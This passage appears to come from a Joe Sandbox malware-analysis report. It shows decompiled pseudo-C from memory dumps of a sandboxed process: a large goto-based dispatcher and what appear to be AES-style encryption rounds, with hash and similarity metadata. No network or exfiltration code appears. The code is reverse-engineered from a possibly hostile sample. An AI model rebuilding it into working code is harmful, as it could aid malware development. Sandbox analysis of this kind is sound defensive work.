                                                                                                                            				if (_t159 == 0) goto 0xf8a7533f;
                                                                                                                            				if (_t159 != 0) goto 0xf8a75976;
                                                                                                                            				_t1 = _t166 + 1; // -12
                                                                                                                            				r8d = _t1;
                                                                                                                            				goto 0xf8a77bf0;
                                                                                                                            				goto E0000025B25BF8A6DC20;
                                                                                                                            				goto E0000025B25BF8A6F370;
                                                                                                                            				goto E0000025B25BF8A6E258;
                                                                                                                            				r8d = 1;
                                                                                                                            				goto E0000025B25BF8A70108;
                                                                                                                            				goto E0000025B25BF8A6DA70;
                                                                                                                            				goto E0000025B25BF8A6DFC0;
                                                                                                                            				goto E0000025B25BF8A6DAAC;
                                                                                                                            				r9d = 1;
                                                                                                                            				r8d = r9d;
                                                                                                                            				goto E0000025B25BF8A7000C;
                                                                                                                            				goto E0000025B25BF8A73540;
                                                                                                                            				if (_t159 == 0) goto 0xf8a754ba;
                                                                                                                            				if (_t159 == 0) goto 0xf8a754ac;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75497;
                                                                                                                            				if (_t159 == 0) goto 0xf8a7547c;
                                                                                                                            				if (_t159 == 0) goto 0xf8a7546e;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75459;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75444;
                                                                                                                            				_t47 = __ecx - 0xffffffffffffffdd;
                                                                                                                            				if (_t159 == 0) goto 0xf8a7542f;
                                                                                                                            				if (_t47 != 3) goto 0xf8a75976;
                                                                                                                            				goto 0xf8a785b4;
                                                                                                                            				goto E0000025B25BF8A72044;
                                                                                                                            				goto E0000025B25BF8A721FC;
                                                                                                                            				goto E0000025B25BF8A720A4;
                                                                                                                            				goto E0000025B25BF8A6F55C;
                                                                                                                            				r8d = 1;
                                                                                                                            				goto E0000025B25BF8A70268;
                                                                                                                            				goto E0000025B25BF8A736B0;
                                                                                                                            				goto E0000025B25BF8A73504;
                                                                                                                            				goto E0000025B25BF8A7373C;
                                                                                                                            				goto E0000025B25BF8A7872C;
                                                                                                                            				_t161 = _t47 - 0x2b;
                                                                                                                            				if (_t161 > 0) goto 0xf8a755bb;
                                                                                                                            				if (_t161 == 0) goto 0xf8a755b3;
                                                                                                                            				if (_t161 == 0) goto 0xf8a7559e;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75589;
                                                                                                                            				if (_t161 == 0) goto 0xf8a7557b;
                                                                                                                            				if (_t161 == 0) goto 0xf8a7556d;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75558;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75548;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75534;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75524;
                                                                                                                            				if (_t161 != 0) goto 0xf8a75976;
                                                                                                                            				goto E0000025B25BF8A7188C;
                                                                                                                            				goto E0000025B25BF8A71A2C;
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto E0000025B25BF8A718DC;
                                                                                                                            				goto E0000025B25BF8A6DD28;
                                                                                                                            				goto E0000025B25BF8A6DD78;
                                                                                                                            				goto E0000025B25BF8A74124;
                                                                                                                            				goto 0xf8a75a0c;
                                                                                                                            				goto 0xf8a75a90;
                                                                                                                            				goto 0xf8a78778;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a7537d;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75676;
                                                                                                                            				if (_t161 == 0) goto 0xf8a7565b;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75656;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75648;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75633;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75622;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75614;
                                                                                                                            				if (_t161 == 0) goto 0xf8a75606;
                                                                                                                            				_t65 = _t47 - 0xffffffffffffffdf;
                                                                                                                            				if (_t161 != 0) goto 0xf8a75976;
                                                                                                                            				goto E0000025B25BF8A6F90C;
                                                                                                                            				goto E0000025B25BF8A6E010;
                                                                                                                            				goto E0000025B25BF8A7382C;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto E0000025B25BF8A737A0;
                                                                                                                            				goto 0xf8a78648;
                                                                                                                            				goto E0000025B25BF8A6DCFC;
                                                                                                                            				r9d = 0;
                                                                                                                            				goto 0xf8a75661;
                                                                                                                            				r9d = 1;
                                                                                                                            				goto E0000025B25BF8A701F4;
                                                                                                                            				r9d = 1;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a753c0;
                                                                                                                            				goto E0000025B25BF8A6FB84;
                                                                                                                            				_t162 = _t65 - 0x4f;
                                                                                                                            				if (_t162 > 0) goto 0xf8a7583f;
                                                                                                                            				if (_t162 == 0) goto 0xf8a75831;
                                                                                                                            				_t163 = _t65 - 0x45;
                                                                                                                            				if (_t163 > 0) goto 0xf8a75775;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7576d;
                                                                                                                            				if (_t163 == 0) goto 0xf8a75758;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7574a;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7573c;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7572e;
                                                                                                                            				if (_t163 == 0) goto 0xf8a75720;
                                                                                                                            				if (_t163 == 0) goto 0xf8a75710;
                                                                                                                            				if (_t163 == 0) goto 0xf8a75704;
                                                                                                                            				if (_t163 == 0) goto 0xf8a756f8;
                                                                                                                            				if (_t163 != 0) goto 0xf8a75976;
                                                                                                                            				goto E0000025B25BF8A72510;
                                                                                                                            				goto 0xf8a75369;
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = 0x25bf8a6c1d9;
                                                                                                                            				goto 0xf8a7553a;
                                                                                                                            				goto E0000025B25BF8A6E568;
                                                                                                                            				goto E0000025B25BF8A6E61C;
                                                                                                                            				goto 0xf8a78d9c;
                                                                                                                            				goto E0000025B25BF8A6E0FC;
                                                                                                                            				goto E0000025B25BF8A6F818;
                                                                                                                            				goto E0000025B25BF8A6F878;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a75331;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7581a;
                                                                                                                            				if (_t163 == 0) goto 0xf8a7580f;
                                                                                                                            				if (_t163 == 0) goto 0xf8a75801;
                                                                                                                            				if (_t163 == 0) goto 0xf8a757f3;
                                                                                                                            				if (_t163 == 0) goto 0xf8a757e5;
                                                                                                                            				if (_t163 == 0) goto 0xf8a757d7;
                                                                                                                            				if (_t163 == 0) goto 0xf8a757c9;
                                                                                                                            				if (_t163 == 0) goto 0xf8a757b4;
                                                                                                                            				if (_t163 != 0) goto 0xf8a75976;
                                                                                                                            				goto E0000025B25BF8A6DAC4;
                                                                                                                            				goto E0000025B25BF8A6E6B8;
                                                                                                                            				goto E0000025B25BF8A6DEA4;
                                                                                                                            				goto E0000025B25BF8A74578;
                                                                                                                            				goto E0000025B25BF8A6FBC4;
                                                                                                                            				goto E0000025B25BF8A6F74C;
                                                                                                                            				goto E0000025B25BF8A6DFB8;
                                                                                                                            				r9d = 1;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a75823;
                                                                                                                            				r9d = 1;
                                                                                                                            				r8d = r9d;
                                                                                                                            				goto E0000025B25BF8A702E4;
                                                                                                                            				goto E0000025B25BF8A740D8;
                                                                                                                            				_t164 = _t65 - 0xffffffffffffffdc - 0x5b;
                                                                                                                            				if (_t164 > 0) goto 0xf8a758f4;
                                                                                                                            				if (_t164 == 0) goto 0xf8a758ec;
                                                                                                                            				if (_t164 == 0) goto 0xf8a758de;
                                                                                                                            				if (_t164 == 0) goto 0xf8a758d0;
                                                                                                                            				if (_t164 == 0) goto 0xf8a758c2;
                                                                                                                            				if (_t164 == 0) goto 0xf8a758b2;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7589d;
                                                                                                                            				if (_t164 == 0) goto 0xf8a75894;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7588f;
                                                                                                                            				if (_t164 == 0) goto 0xf8a75883;
                                                                                                                            				if (_t164 != 0) goto 0xf8a75976;
                                                                                                                            				r9d = 0;
                                                                                                                            				goto 0xf8a7567c;
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = 0x25bf8a6c1d9;
                                                                                                                            				goto 0xf8a753c0;
                                                                                                                            				r9d = 0;
                                                                                                                            				goto 0xf8a75815;
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = 0x25bf8a6c1d9;
                                                                                                                            				goto 0xf8a75823;
                                                                                                                            				goto E0000025B25BF8A72988;
                                                                                                                            				goto E0000025B25BF8A6BC7C;
                                                                                                                            				goto E0000025B25BF8A6BD00;
                                                                                                                            				goto E0000025B25BF8A6BB84;
                                                                                                                            				goto E0000025B25BF8A73890;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a75482;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7596c;
                                                                                                                            				if (_t164 == 0) goto 0xf8a75958;
                                                                                                                            				if (_t164 == 0) goto 0xf8a75953;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7593f;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7593a;
                                                                                                                            				if (_t164 == 0) goto 0xf8a7592c;
                                                                                                                            				if (_t164 == 0) goto 0xf8a75921;
                                                                                                                            				if (_t164 != 0) goto 0xf8a75976;
                                                                                                                            				r8d = 0x100007f;
                                                                                                                            				goto 0xf8a75625;
                                                                                                                            				r9d = 1;
                                                                                                                            				goto 0xf8a75537;
                                                                                                                            				goto E0000025B25BF8A6C438;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a75945;
                                                                                                                            				r8d = 1;
                                                                                                                            				goto E0000025B25BF8A706CC;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a7595e;
                                                                                                                            				r8d = 1;
                                                                                                                            				goto E0000025B25BF8A7057C;
                                                                                                                            				return E0000025B25BF8A74490(_t65 - 0xffffffffffffff1c, r8d, r8d, __rdx);
                                                                                                                            			}














                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f78aa7e5eb3977471cc3ec1bdac26d01691bdcdd88ce57bc4dc661ce3c4360e5
                                                                                                                            • Instruction ID: aa3679447e86904e065ba8b25d9d96d582eb4b14a3582c5c0b191819b9fdb3fe
                                                                                                                            • Opcode Fuzzy Hash: f78aa7e5eb3977471cc3ec1bdac26d01691bdcdd88ce57bc4dc661ce3c4360e5
                                                                                                                            • Instruction Fuzzy Hash: 7B72D213B05E4082FE6ADB269C5C36D12D1F7897A2FB45115FA0A43FD9EF38C542A728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction ID: 5d08ac09490c35573e175cac35b875ea96dfeb7525e255db5d8f017e4c39313d
                                                                                                                            • Opcode Fuzzy Hash: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction Fuzzy Hash: 6862FB312286558FD31CCB1CC5B1B7AB7E1FB8A340F44896DE28BCB692C639D945CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction ID: 64e202115224da9e4eab7a1740e5bf712e3601120f2dcb188374b81781102e28
                                                                                                                            • Opcode Fuzzy Hash: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction Fuzzy Hash: 3552EE312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE286CB692C639D645CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A879D0(void* __edi, void* __esp, long long __rcx, long long __rdx, long long __r8, char* _a4, long long _a8, intOrPtr _a12, long long _a16, long long _a24) {
                                                                                                                            				signed long long _v4;
                                                                                                                            				signed int _v24;
                                                                                                                            				signed int _v28;
                                                                                                                            				signed long long _v36;
                                                                                                                            				signed int _v40;
                                                                                                                            				signed int _v44;
                                                                                                                            				signed int _v48;
                                                                                                                            				signed int _v52;
                                                                                                                            				unsigned int _v56;
                                                                                                                            				unsigned int _v60;
                                                                                                                            				unsigned int _v64;
                                                                                                                            				signed long long _t731;
                                                                                                                            				signed long long _t732;
                                                                                                                            				signed long long _t733;
                                                                                                                            				signed long long _t734;
                                                                                                                            				signed long long _t735;
                                                                                                                            				signed long long _t736;
                                                                                                                            				signed long long _t737;
                                                                                                                            				signed long long _t738;
                                                                                                                            				signed long long _t739;
                                                                                                                            				signed long long _t741;
                                                                                                                            				signed long long _t744;
                                                                                                                            				signed long long _t745;
                                                                                                                            				signed long long _t749;
                                                                                                                            				signed long long _t750;
                                                                                                                            				signed long long _t754;
                                                                                                                            				signed long long _t755;
                                                                                                                            				signed long long _t759;
                                                                                                                            				signed long long _t760;
                                                                                                                            				signed long long _t816;
                                                                                                                            				signed long long _t819;
                                                                                                                            				signed long long _t822;
                                                                                                                            				signed long long _t825;
                                                                                                                            				signed long long _t828;
                                                                                                                            				signed long long _t831;
                                                                                                                            				signed long long _t834;
                                                                                                                            				signed long long _t837;
                                                                                                                            				void* _t874;
                                                                                                                            				signed int* _t875;
                                                                                                                            
                                                                                                                            				_a24 = __r8;
                                                                                                                            				_a16 = __rdx;
                                                                                                                            				_a8 = __rcx;
                                                                                                                            				_t875 = _t874 - 0x30;
                                                                                                                            				memset(__edi, 0xcccccccc, 0xc << 2);
                                                                                                                            				_v28 =  *((intOrPtr*)(_a12 + 0x1e0));
                                                                                                                            				_t731 = _a12 + 0xf0;
                                                                                                                            				_v36 = _t731;
                                                                                                                            				_t732 = _t731 * 0;
                                                                                                                            				_t744 = _v4;
                                                                                                                            				_t745 = _t744;
                                                                                                                            				 *_t875 = ( *(_t744 + _t732) & 0xff) << 0x00000018 | ( *(_v4 + _t745) & 0xff) << 0x00000010 | ( *(_v4 + _t745 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t745 * 2 * 3) & 0xff;
                                                                                                                            				_t733 = _t732 * 0;
                                                                                                                            				 *_t875 =  *_t875 ^  *(_v36 + _t733);
                                                                                                                            				_t734 = _t733 * 0;
                                                                                                                            				_t749 = _v4;
                                                                                                                            				_t750 = _t749;
                                                                                                                            				_v64 = ( *(_t749 + _t734 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t750 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t750 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t750 * 2 * 3) & 0xff;
                                                                                                                            				_t735 = _t734;
                                                                                                                            				_v64 = _v64 ^  *(_v36 + _t735);
                                                                                                                            				_t736 = _t735 * 0;
                                                                                                                            				_t754 = _v4;
                                                                                                                            				_t755 = _t754;
                                                                                                                            				_v60 = ( *(_t754 + _t736 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t755 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t755 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t755 * 2 * 3) & 0xff;
                                                                                                                            				_t737 = _t736 * 2;
                                                                                                                            				_v60 = _v60 ^  *(_v36 + _t737);
                                                                                                                            				_t738 = _t737 * 0;
                                                                                                                            				_t759 = _v4;
                                                                                                                            				_t760 = _t759;
                                                                                                                            				_t761 = _t760 * 2;
                                                                                                                            				_t816 = _v4;
                                                                                                                            				_v56 = ( *(_t759 + _t738 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t760 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t760 * 2) & 0xff) << 0x00000008 |  *(_t816 + 0xc + _t761 * 3) & 0xff;
                                                                                                                            				_t739 = _t738 * 3;
                                                                                                                            				_v56 = _v56 ^  *(_v36 + _t739);
                                                                                                                            				_v24 = _v28 >> 1;
                                                                                                                            				_t819 = _v36;
                                                                                                                            				_v52 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t816 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t819 + 0x96fe2a49e80);
                                                                                                                            				_t822 = _v36;
                                                                                                                            				_v48 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t819 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t822 + 0xbcbdb4dc620);
                                                                                                                            				_t825 = _v36;
                                                                                                                            				_v44 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t822 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t825 + 0xe27d3f6edc0);
                                                                                                                            				_t828 = _v36;
                                                                                                                            				_v40 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t825 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t828 + 0x1083cca01560);
                                                                                                                            				_t741 = _v36 + 0x20;
                                                                                                                            				_v36 = _t741;
                                                                                                                            				_v24 = _v24 - 1;
                                                                                                                            				if (_v24 != 0) goto 0xf8a87e26;
                                                                                                                            				goto 0xf8a87fca;
                                                                                                                            				_t831 = _v36;
                                                                                                                            				 *_t875 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t828 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *_t831;
                                                                                                                            				_t834 = _v36;
                                                                                                                            				_v64 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t831 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t834 + 0x25bf8a927a0);
                                                                                                                            				_t837 = _v36;
                                                                                                                            				_v60 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t834 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t837 + 0x4b7f1524f40);
                                                                                                                            				_v56 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t837 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_v36 + 0x713e9fb76e0);
                                                                                                                            				goto 0xf8a87c66;
                                                                                                                            				 *_t875 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
                                                                                                                            				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000008 & 0x000000ff;
                                                                                                                            				 *_a4 =  *_t875 & 0x000000ff;
                                                                                                                            				_v64 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000008 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 4)) = _v64 & 0x000000ff;
                                                                                                                            				_v60 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000008 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 8)) = _v60 & 0x000000ff;
                                                                                                                            				_v56 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000008 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xc)) = _v56 & 0x000000ff;
                                                                                                                            				return 0;
                                                                                                                            			}










































                                                                                                                            0x25bf8a87f51
                                                                                                                            0x25bf8a87f59
                                                                                                                            0x25bf8a87fc1
                                                                                                                            0x25bf8a87fc5
                                                                                                                            0x25bf8a88048
                                                                                                                            0x25bf8a88064
                                                                                                                            0x25bf8a88080
                                                                                                                            0x25bf8a8809c
                                                                                                                            0x25bf8a880b5
                                                                                                                            0x25bf8a88136
                                                                                                                            0x25bf8a88154
                                                                                                                            0x25bf8a88172
                                                                                                                            0x25bf8a88190
                                                                                                                            0x25bf8a881ab
                                                                                                                            0x25bf8a8822d
                                                                                                                            0x25bf8a8824b
                                                                                                                            0x25bf8a88269
                                                                                                                            0x25bf8a88287
                                                                                                                            0x25bf8a882a2
                                                                                                                            0x25bf8a88324
                                                                                                                            0x25bf8a88342
                                                                                                                            0x25bf8a88360
                                                                                                                            0x25bf8a8837e
                                                                                                                            0x25bf8a88399
                                                                                                                            0x25bf8a883a4

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction ID: 045150c39ebc9c037c80409270430a778929e22f70f1c40cd2c7a47bd3de3496
                                                                                                                            • Opcode Fuzzy Hash: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction Fuzzy Hash: 495244722189418BDB08CB1CE8A173AB7A1F3C9B81F444529E79B8BB99CB3CD550CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A87060(void* __edi, void* __esp, long long __rcx, long long __rdx, long long __r8, signed long long _a4, long long _a8, signed long long _a12, long long _a16, long long _a24) {
                                                                                                                            				signed long long _v4;
                                                                                                                            				signed int _v24;
                                                                                                                            				signed int _v28;
                                                                                                                            				signed long long _v36;
                                                                                                                            				signed int _v40;
                                                                                                                            				signed int _v44;
                                                                                                                            				signed int _v48;
                                                                                                                            				signed int _v52;
                                                                                                                            				unsigned int _v56;
                                                                                                                            				unsigned int _v60;
                                                                                                                            				unsigned int _v64;
                                                                                                                            				signed long long _t706;
                                                                                                                            				signed long long _t707;
                                                                                                                            				signed long long _t708;
                                                                                                                            				signed long long _t709;
                                                                                                                            				signed long long _t710;
                                                                                                                            				signed long long _t711;
                                                                                                                            				signed long long _t712;
                                                                                                                            				signed long long _t713;
                                                                                                                            				signed long long _t714;
                                                                                                                            				signed long long _t716;
                                                                                                                            				signed long long _t719;
                                                                                                                            				signed long long _t720;
                                                                                                                            				signed long long _t724;
                                                                                                                            				signed long long _t725;
                                                                                                                            				signed long long _t729;
                                                                                                                            				signed long long _t730;
                                                                                                                            				signed long long _t734;
                                                                                                                            				signed long long _t735;
                                                                                                                            				signed long long _t791;
                                                                                                                            				signed long long _t794;
                                                                                                                            				signed long long _t797;
                                                                                                                            				signed long long _t800;
                                                                                                                            				signed long long _t803;
                                                                                                                            				signed long long _t806;
                                                                                                                            				signed long long _t809;
                                                                                                                            				signed long long _t812;
                                                                                                                            				signed long long _t815;
                                                                                                                            				signed long long _t822;
                                                                                                                            				signed long long _t829;
                                                                                                                            				signed long long _t836;
                                                                                                                            				void* _t845;
                                                                                                                            				signed int* _t846;
                                                                                                                            
                                                                                                                            				_a24 = __r8;
                                                                                                                            				_a16 = __rdx;
                                                                                                                            				_a8 = __rcx;
                                                                                                                            				_t846 = _t845 - 0x30;
                                                                                                                            				memset(__edi, 0xcccccccc, 0xc << 2);
                                                                                                                            				_v28 =  *((intOrPtr*)(_a12 + 0x1e0));
                                                                                                                            				_t706 = _a12;
                                                                                                                            				_v36 = _t706;
                                                                                                                            				_t707 = _t706 * 0;
                                                                                                                            				_t719 = _v4;
                                                                                                                            				_t720 = _t719;
                                                                                                                            				 *_t846 = ( *(_t719 + _t707) & 0xff) << 0x00000018 | ( *(_v4 + _t720) & 0xff) << 0x00000010 | ( *(_v4 + _t720 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t720 * 2 * 3) & 0xff;
                                                                                                                            				_t708 = _t707 * 0;
                                                                                                                            				 *_t846 =  *_t846 ^  *(_v36 + _t708);
                                                                                                                            				_t709 = _t708 * 0;
                                                                                                                            				_t724 = _v4;
                                                                                                                            				_t725 = _t724;
                                                                                                                            				_v64 = ( *(_t724 + _t709 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t725 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t725 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t725 * 2 * 3) & 0xff;
                                                                                                                            				_t710 = _t709;
                                                                                                                            				_v64 = _v64 ^  *(_v36 + _t710);
                                                                                                                            				_t711 = _t710 * 0;
                                                                                                                            				_t729 = _v4;
                                                                                                                            				_t730 = _t729;
                                                                                                                            				_v60 = ( *(_t729 + _t711 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t730 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t730 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t730 * 2 * 3) & 0xff;
                                                                                                                            				_t712 = _t711 * 2;
                                                                                                                            				_v60 = _v60 ^  *(_v36 + _t712);
                                                                                                                            				_t713 = _t712 * 0;
                                                                                                                            				_t734 = _v4;
                                                                                                                            				_t735 = _t734;
                                                                                                                            				_t736 = _t735 * 2;
                                                                                                                            				_t791 = _v4;
                                                                                                                            				_v56 = ( *(_t734 + _t713 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t735 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t735 * 2) & 0xff) << 0x00000008 |  *(_t791 + 0xc + _t736 * 3) & 0xff;
                                                                                                                            				_t714 = _t713 * 3;
                                                                                                                            				_v56 = _v56 ^  *(_v36 + _t714);
                                                                                                                            				_v24 = _v28 >> 1;
                                                                                                                            				_t794 = _v36;
                                                                                                                            				_v52 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t791 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t794 + 0x96fe2a47e80);
                                                                                                                            				_t797 = _v36;
                                                                                                                            				_v48 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t794 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t797 + 0xbcbdb4d9e20);
                                                                                                                            				_t800 = _v36;
